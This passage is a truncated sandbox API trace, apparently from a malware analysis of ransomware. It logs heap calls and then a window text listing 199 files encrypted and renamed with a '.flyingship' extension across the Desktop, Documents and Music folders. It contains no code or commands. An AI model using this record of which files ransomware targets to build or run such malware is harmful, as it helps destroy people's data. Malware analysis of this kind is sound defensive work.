hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d620 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.405] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52780 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d620 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40c8 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4260 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41a0 [0248.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4188 [0248.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4230 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4278 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52790 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x44) returned 0xe118c8 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4c) returned 0xdec048 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d648 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4290 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527a0 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xc) returned 0xdf40e0 [0248.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4278 | out: hHeap=0xbe0000) returned 1 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8020) returned 0xe9aca0 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4278 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52730 [0248.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d670 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40b0 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527b0 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42a8 [0248.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf42c0 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527c0 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4500 [0248.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44e8 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52810 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44d0 [0248.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44a0 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52800 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf44b8 [0248.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4110 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527f0 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf40f8 [0248.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43b0 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527e0 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43e0 [0248.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43f8 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52830 [0248.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4410 [0248.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4428 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe527d0 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4440 [0248.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xe016a0 [0248.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d670 | out: hHeap=0xbe0000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4458 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52820 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4470 [0248.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf43c8 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52850 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4398 [0248.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4368 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x6) returned 0xe52720 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52860 [0248.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4380 [0248.410] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.410] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4338 [0248.410] SetWindowTextW (hWnd=0x20168, lpString="Encrypted files: 199\r\n\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\BhG Xz5NyPYF_.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\dU_Aud-fZ3ji9.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\I_yvZxV2VbG06XDhaG1Z.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1SXWH1rq8k oa-Gv-.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4N8tFmD4.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6EgOrexJkDL7op.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6F5BQoLL3Uym0CamPlpJ.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6iBbdX1qsRyDlZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7zcAt1JobB0Roi5s.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8dBnuAEyPilbFpD.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9MGcT.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CosD3IMWD.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DBSZqxeH.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FL0fY8Lpz-WJNvLo.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gJmnMJqziFMsIe_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gyeJKtGlaF.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\J-Lwl.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mKicOCoALM.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS 